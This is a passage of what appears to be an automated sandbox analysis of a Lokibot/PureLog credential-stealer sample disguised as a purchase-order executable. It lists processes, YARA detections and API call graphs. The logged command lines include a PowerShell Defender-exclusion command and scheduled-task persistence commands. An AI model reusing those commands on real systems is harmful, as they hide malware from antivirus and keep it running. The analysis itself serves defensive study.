                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
                        Imagebase:0x100000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:06:02:47
                        Start date:29/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6ee680000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:06:02:47
                        Start date:29/08/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"
                        Imagebase:0x700000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:06:02:47
                        Start date:29/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6ee680000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:06:02:47
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Imagebase:0xd70000
                        File size:606'216 bytes
                        MD5 hash:8C71713FD5663BCBE87118FC47DE3EC5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Target ID:10
                        Start time:06:02:49
                        Start date:29/08/2024
                        Path:C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        Imagebase:0x3f0000
                        File size:606'216 bytes
                        MD5 hash:8C71713FD5663BCBE87118FC47DE3EC5
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 53%, ReversingLabs
                        • Detection: 59%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        Target ID:11
                        Start time:06:02:50
                        Start date:29/08/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff605670000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:06:02:55
                        Start date:29/08/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"
                        Imagebase:0x700000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:06:02:55
                        Start date:29/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6ee680000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:06:02:55
                        Start date:29/08/2024
                        Path:C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\VvtddClQv.exe"
                        Imagebase:0xa50000
                        File size:606'216 bytes
                        MD5 hash:8C71713FD5663BCBE87118FC47DE3EC5
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:81
                          Total number of Limit Nodes:10
                          execution_graph 20118 4f946e8 DuplicateHandle 20119 4f9477e 20118->20119 20120 4f944a0 20121 4f944e6 GetCurrentProcess 20120->20121 20123 4f94538 GetCurrentThread 20121->20123 20124 4f94531 20121->20124 20125 4f9456e 20123->20125 20126 4f94575 GetCurrentProcess 20123->20126 20124->20123 20125->20126 20129 4f945ab 20126->20129 20127 4f945d3 GetCurrentThreadId 20128 4f94604 20127->20128 20129->20127 20130 4f98850 20131 4f988b8 CreateWindowExW 20130->20131 20133 4f98974 20131->20133 20134 4f91d10 20135 4f91d1f 20134->20135 20138 4f91e08 20134->20138 20146 4f91dfa 20134->20146 20139 4f91e19 20138->20139 20140 4f91e3c 20138->20140 20139->20140 20154 4f920a0 20139->20154 20158 4f92090 20139->20158 20140->20135 20141 4f91e34 20141->20140 20142 4f92040 GetModuleHandleW 20141->20142 20143 4f9206d 20142->20143 20143->20135 20147 4f91e19 20146->20147 20148 4f91e3c 20146->20148 20147->20148 20152 4f920a0 LoadLibraryExW 20147->20152 20153 4f92090 LoadLibraryExW 20147->20153 20148->20135 20149 4f91e34 20149->20148 20150 4f92040 GetModuleHandleW 20149->20150 20151 4f9206d 20150->20151 20151->20135 20152->20149 20153->20149 20155 4f920b4 20154->20155 20156 4f920d9 20155->20156 20162 4f911e8 20155->20162 20156->20141 20159 4f920b4 20158->20159 20160 4f920d9 20159->20160 20161 4f911e8 LoadLibraryExW 20159->20161 20160->20141 20161->20160 20163 4f92680 LoadLibraryExW 20162->20163 20165 4f926f9 20163->20165 20165->20156 20166 4f9af80 20167 4f9af94 20166->20167 20168 4f9b09c 20167->20168 20169 4f9aff2 20167->20169 20173 4f9620c 20168->20173 20171 4f9b04a CallWindowProcW 20169->20171 20172 4f9aff9 20169->20172 20171->20172 20174 4f96217 20173->20174 20176 4f997c9 20174->20176 20177 4f96334 CallWindowProcW 20174->20177 20177->20176 20178 10d4b70 20180 10d4b8c 20178->20180 20179 10d4c1b 20180->20179 20182 10d5198 20180->20182 20183 10d51bd 20182->20183 20187 10d5299 20183->20187 20191 10d52a8 20183->20191 20188 10d52cf 20187->20188 20190 10d53ac 20188->20190 20195 10d4e8c 20188->20195 20192 10d52cf 20191->20192 20193 10d53ac 20192->20193 20194 10d4e8c CreateActCtxA 20192->20194 20193->20193 20194->20193 20196 10d6338 CreateActCtxA 20195->20196 20198 10d63fb 20196->20198 20198->20198 20199 e3d01c 20200 e3d034 20199->20200 20201 e3d08e 20200->20201 20205 4f9620c CallWindowProcW 20200->20205 20206 4f99769 20200->20206 20210 4f98a08 20200->20210 20214 4f989f8 20200->20214 20205->20201 20207 4f997a5 20206->20207 20209 4f997c9 20207->20209 20218 4f96334 CallWindowProcW 20207->20218 20211 4f98a2e 20210->20211 20212 4f9620c CallWindowProcW 20211->20212 20213 4f98a4f 20212->20213 20213->20201 20215 4f98a2e 20214->20215 20216 4f9620c CallWindowProcW 20215->20216 20217 4f98a4f 20216->20217 20217->20201 20218->20209

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 04F9451E
                          • GetCurrentThread.KERNEL32 ref: 04F9455B
                          • GetCurrentProcess.KERNEL32 ref: 04F94598
                          • GetCurrentThreadId.KERNEL32 ref: 04F945F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 3cb7a7c0f23376ad777a489cecb37e74f6762a45d1c9dc3b6d85e122da710ba9
                          • Instruction ID: b26456d7381a38d1bd2107dc552e0d5ce49653eb86f45e4af05fb865078c1b88
                          • Opcode Fuzzy Hash: 3cb7a7c0f23376ad777a489cecb37e74f6762a45d1c9dc3b6d85e122da710ba9
                          • Instruction Fuzzy Hash: 37516AB4900649CFEB54DFA9D548BDEBBF1EF88304F248459E409A7350DB34A946CF26

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 04F9451E
                          • GetCurrentThread.KERNEL32 ref: 04F9455B
                          • GetCurrentProcess.KERNEL32 ref: 04F94598
                          • GetCurrentThreadId.KERNEL32 ref: 04F945F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: dc7076f8888c14db0b16715d68f7c9d69c18c599c829e85a0a880e4efafa58bf
                          • Instruction ID: 1c0c3b02a8d798a19535209de0d0f6745aa449c2442fc9f31bca0376a687a068
                          • Opcode Fuzzy Hash: dc7076f8888c14db0b16715d68f7c9d69c18c599c829e85a0a880e4efafa58bf
                          • Instruction Fuzzy Hash: 585177B4900709CFEB54DFAAE548B9EBBF1EF88314F208459E409A7350DB34A945CF66

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 47 4f91e08-4f91e17 48 4f91e19-4f91e26 call 4f91180 47->48 49 4f91e43-4f91e47 47->49 56 4f91e28 48->56 57 4f91e3c 48->57 50 4f91e49-4f91e53 49->50 51 4f91e5b-4f91e9c 49->51 50->51 58 4f91ea9-4f91eb7 51->58 59 4f91e9e-4f91ea6 51->59 102 4f91e2e call 4f920a0 56->102 103 4f91e2e call 4f92090 56->103 57->49 60 4f91eb9-4f91ebe 58->60 61 4f91edb-4f91edd 58->61 59->58 64 4f91ec9 60->64 65 4f91ec0-4f91ec7 call 4f9118c 60->65 66 4f91ee0-4f91ee7 61->66 62 4f91e34-4f91e36 62->57 63 4f91f78-4f92038 62->63 97 4f9203a-4f9203d 63->97 98 4f92040-4f9206b GetModuleHandleW 63->98 69 4f91ecb-4f91ed9 64->69 65->69 67 4f91ee9-4f91ef1 66->67 68 4f91ef4-4f91efb 66->68 67->68 71 4f91f08-4f91f11 call 4f9119c 68->71 72 4f91efd-4f91f05 68->72 69->66 78 4f91f1e-4f91f23 71->78 79 4f91f13-4f91f1b 71->79 72->71 81 4f91f41-4f91f4e 78->81 82 4f91f25-4f91f2c 78->82 79->78 87 4f91f71-4f91f77 81->87 88 4f91f50-4f91f6e 81->88 82->81 83 4f91f2e-4f91f3e call 4f911ac call 4f911bc 82->83 83->81 88->87 97->98 99 4f9206d-4f92073 98->99 100 4f92074-4f92088 98->100 99->100 102->62 103->62
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 04F9205E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 6a4ea20bc3baadb074959fac42f31937ff6af3b67e8d62a7b7a3454f5a0948e8
                          • Instruction ID: b0eb443ae3dde067cc945168cd16ccaf1f2fbe284b237424d463057175a85c09
                          • Opcode Fuzzy Hash: 6a4ea20bc3baadb074959fac42f31937ff6af3b67e8d62a7b7a3454f5a0948e8
                          • Instruction Fuzzy Hash: FC714670A00B069FEB24DF29D54475ABBF5FF88304F008A29D45AD7A50DB74F946CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 104 4f98850-4f988b6 105 4f988b8-4f988be 104->105 106 4f988c1-4f988c8 104->106 105->106 107 4f988ca-4f988d0 106->107 108 4f988d3-4f98972 CreateWindowExW 106->108 107->108 110 4f9897b-4f989b3 108->110 111 4f98974-4f9897a 108->111 115 4f989c0 110->115 116 4f989b5-4f989b8 110->116 111->110 117 4f989c1 115->117 116->115 117->117
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F98962
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: 5b9b2b1419d23db7c23b99b58ed0a7676b8dcc10c606a8e84f86b292fd7666fa
                          • Instruction ID: d4d63ac8cf9d8629665c68efaa74fc159714ba2cecdfb4ffcf9ca85172ea8f4b
                          • Opcode Fuzzy Hash: 5b9b2b1419d23db7c23b99b58ed0a7676b8dcc10c606a8e84f86b292fd7666fa
                          • Instruction Fuzzy Hash: 7B41C0B1D10349DFEB14CF99C884ADEBBF5BF48750F24812AE818AB210D775A845CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 4f98844-4f988b6 119 4f988b8-4f988be 118->119 120 4f988c1-4f988c8 118->120 119->120 121 4f988ca-4f988d0 120->121 122 4f988d3-4f9890b 120->122 121->122 123 4f98913-4f98972 CreateWindowExW 122->123 124 4f9897b-4f989b3 123->124 125 4f98974-4f9897a 123->125 129 4f989c0 124->129 130 4f989b5-4f989b8 124->130 125->124 131 4f989c1 129->131 130->129 131->131
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F98962
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: 839f9ff791f7ca9ca84290e54ae492dcaaa8b58ed8d8270f8e823467866bcc2f
                          • Instruction ID: 3e86d8436470a8e4316bdd6c41c92e32617dca8c537a0941463ed19aaf8884ee
                          • Opcode Fuzzy Hash: 839f9ff791f7ca9ca84290e54ae492dcaaa8b58ed8d8270f8e823467866bcc2f
                          • Instruction Fuzzy Hash: 6051D0B5D10349DFEB14CF99C880ADEBBF1BF48350F24812AE819AB210D775A845CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 132 10d632c-10d63f9 CreateActCtxA 134 10d63fb-10d6401 132->134 135 10d6402-10d645c 132->135 134->135 142 10d645e-10d6461 135->142 143 10d646b-10d646f 135->143 142->143 144 10d6471-10d647d 143->144 145 10d6480 143->145 144->145 147 10d6481 145->147 147->147
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 010D63E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 003e09527b9e922b5fc02de18059f9ea4dd5712f110c2714389e543712d91bd5
                          • Instruction ID: 199fd085cd9d2c7d10fbc4c5ea7f9b8bd606e52f911f8aba7e00322f64216e8c
                          • Opcode Fuzzy Hash: 003e09527b9e922b5fc02de18059f9ea4dd5712f110c2714389e543712d91bd5
                          • Instruction Fuzzy Hash: FC41B0B0C00719CBEB24CFA9C844BCEBBF5BF89704F20816AD448AB251DB766946CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 148 4f96334-4f9afec 151 4f9b09c-4f9b0bc call 4f9620c 148->151 152 4f9aff2-4f9aff7 148->152 159 4f9b0bf-4f9b0cc 151->159 154 4f9aff9-4f9b030 152->154 155 4f9b04a-4f9b082 CallWindowProcW 152->155 161 4f9b039-4f9b048 154->161 162 4f9b032-4f9b038 154->162 157 4f9b08b-4f9b09a 155->157 158 4f9b084-4f9b08a 155->158 157->159 158->157 161->159 162->161
                          APIs
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F9B071
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: CallProcWindow
                          • String ID:
                          • API String ID: 2714655100-0
                          • Opcode ID: 8299e2a450c0ee92f6d8617ba0f487b55e77abb77b4e2262b436669c9872041d
                          • Instruction ID: 575ab11effa2b32f55e62c0940c3df4025c9c6de2c7c7da360f657d785cd6ce1
                          • Opcode Fuzzy Hash: 8299e2a450c0ee92f6d8617ba0f487b55e77abb77b4e2262b436669c9872041d
                          • Instruction Fuzzy Hash: A8415BB5A00309DFEB14CF99D448BAABBF5FB88314F148459D519AB321D735B842CFA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 165 10d4e8c-10d63f9 CreateActCtxA 168 10d63fb-10d6401 165->168 169 10d6402-10d645c 165->169 168->169 176 10d645e-10d6461 169->176 177 10d646b-10d646f 169->177 176->177 178 10d6471-10d647d 177->178 179 10d6480 177->179 178->179 181 10d6481 179->181 181->181
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 010D63E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 5bdcbc425e29c113ca373dc0046ff031ce30a187d44376f8b85475f9faa637c7
                          • Instruction ID: 0205f6bec6927366e8a1eb13ff1be9b423e079cf0e03336b0136939c08a1050c
                          • Opcode Fuzzy Hash: 5bdcbc425e29c113ca373dc0046ff031ce30a187d44376f8b85475f9faa637c7
                          • Instruction Fuzzy Hash: B841B270C00719CFEB24DFA9C844B9EBBF5BF89704F20816AD448AB251DB766946CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 182 4f946e0-4f946e1 183 4f946e3-4f9477c DuplicateHandle 182->183 184 4f946d6 182->184 185 4f9477e-4f94784 183->185 186 4f94785-4f947a2 183->186 184->182 185->186
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F9476F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 0a4b1fe3327bf07bd12a1e5fcec9d3a9097295ebe04483e7c3e928c607cb58d3
                          • Instruction ID: 3a9bc4bf00d81e5c10432527c9e4e045652eb753f398533b4d8896d053c0dcfc
                          • Opcode Fuzzy Hash: 0a4b1fe3327bf07bd12a1e5fcec9d3a9097295ebe04483e7c3e928c607cb58d3
                          • Instruction Fuzzy Hash: 2421F2B9900348DFEB10CFA9D984ADEBFF5EB48310F24805AE954A7350D378A945CF65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 189 4f946e8-4f9477c DuplicateHandle 190 4f9477e-4f94784 189->190 191 4f94785-4f947a2 189->191 190->191
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F9476F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: c0f29d4075877c45333cb5bb17a5f62a1050cdb0b000698bdd7169ed9293c22a
                          • Instruction ID: 0140571669ab69d8b214e7bea45054451593d8624063718709df21264d9ebd86
                          • Opcode Fuzzy Hash: c0f29d4075877c45333cb5bb17a5f62a1050cdb0b000698bdd7169ed9293c22a
                          • Instruction Fuzzy Hash: ED21C4B5D00248EFDB10CFAAD884ADEFBF8EB48310F14841AE914A7350D379A945CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 194 4f911e8-4f926c0 196 4f926c8-4f926f7 LoadLibraryExW 194->196 197 4f926c2-4f926c5 194->197 198 4f926f9-4f926ff 196->198 199 4f92700-4f9271d 196->199 197->196 198->199
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,04F920D9,00000800,00000000,00000000), ref: 04F926EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 9d502e24c9f25e8a78e73fb3cc2723a3570ec21ce6a1102a245d13fa5f9786af
                          • Instruction ID: 61ddf14b93f9ff9662d94c10f9d3f6665b8654ceffeba3b260476e1e894d66b9
                          • Opcode Fuzzy Hash: 9d502e24c9f25e8a78e73fb3cc2723a3570ec21ce6a1102a245d13fa5f9786af
                          • Instruction Fuzzy Hash: 791106B6D00349DFEB10CF9AD444B9EFBF4AB48310F11845AD515A7610C375A945CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 202 4f92679-4f926c0 203 4f926c8-4f926f7 LoadLibraryExW 202->203 204 4f926c2-4f926c5 202->204 205 4f926f9-4f926ff 203->205 206 4f92700-4f9271d 203->206 204->203 205->206
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,04F920D9,00000800,00000000,00000000), ref: 04F926EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: eb7c27af5a4fda7868fdac5ad8c635a05057b667fd53d92651c59e7d9ee6abf6
                          • Instruction ID: 326e195d8d71752006f92fe503c12551b2998329e9396990e01d7f9f87c13cc4
                          • Opcode Fuzzy Hash: eb7c27af5a4fda7868fdac5ad8c635a05057b667fd53d92651c59e7d9ee6abf6
                          • Instruction Fuzzy Hash: F01114B6C00349DFEB20CFAAD444ADEFBF4EB48310F11842AD819A7610C375A946CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 4f91ff8-4f92038 210 4f9203a-4f9203d 209->210 211 4f92040-4f9206b GetModuleHandleW 209->211 210->211 212 4f9206d-4f92073 211->212 213 4f92074-4f92088 211->213 212->213
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 04F9205E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 0bc508f26561683c2838e1854456da7bc2b79d235f42861b4717b575a3db013a
                          • Instruction ID: 76a172b61c77f779c5a50f20a1bfdfa8d1a2386e6f3a62e1e51bb894a8c7881f
                          • Opcode Fuzzy Hash: 0bc508f26561683c2838e1854456da7bc2b79d235f42861b4717b575a3db013a
                          • Instruction Fuzzy Hash: 35110FB5C006499FEB24CF9AC444B9EFBF4AB88320F11845AD818A7210C379A946CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743875758.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_e2d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf48597a997ac246f2b1792acb037a33777f548d21fbb39bd0f655ad9e6461ca
                          • Instruction ID: 5a3023fcadfde65a0ad682afe1b490f5cebee1f756146c036d8a5be0c5ce3f54
                          • Opcode Fuzzy Hash: cf48597a997ac246f2b1792acb037a33777f548d21fbb39bd0f655ad9e6461ca
                          • Instruction Fuzzy Hash: FC213A71508344EFDB14EF14EDC0B26BF65FB94324F24C569EA091B246C336E856CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                          Joe Sandbox IDA Plugin
